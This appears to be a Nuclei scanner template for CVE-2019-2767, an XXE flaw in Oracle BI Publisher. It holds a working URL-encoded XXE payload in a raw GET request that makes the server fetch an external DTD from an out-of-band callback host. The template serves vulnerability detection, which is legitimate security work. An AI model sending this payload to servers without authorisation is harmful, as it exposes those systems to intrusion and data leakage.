28 lines
1.1 KiB
YAML
28 lines
1.1 KiB
YAML
id: CVE-2019-2767
|
|
|
|
info:
|
|
name: Oracle Business Intelligence - Publisher XXE
|
|
author: madrobot
|
|
severity: high
|
|
description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
|
- https://www.exploit-db.com/exploits/46729
|
|
tags: cve,cve2019,oracle,xxe,oob
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.20
|
|
cve-id: CVE-2019-2767
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|